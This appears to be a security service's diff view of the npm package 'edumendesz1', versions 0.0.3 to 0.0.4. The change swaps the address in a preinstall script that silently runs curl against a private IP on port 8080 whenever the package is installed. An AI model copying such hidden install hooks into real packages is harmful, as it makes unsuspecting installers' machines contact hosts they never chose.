edumendesz1 0.0.3 → 0.0.4

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +2 -2
package/package.json CHANGED
@@ -1,7 +1,7 @@
1
1
  {
2
2
  "name" : "edumendesz1",
3
- "version" : "0.0.3",
3
+ "version" : "0.0.4",
4
4
  "scripts" : {
5
- "preinstall" : "curl https://10.0.2.15:8080"
5
+ "preinstall" : "curl https://192.168.15.4:8080"
6
6
  }
7
7
  }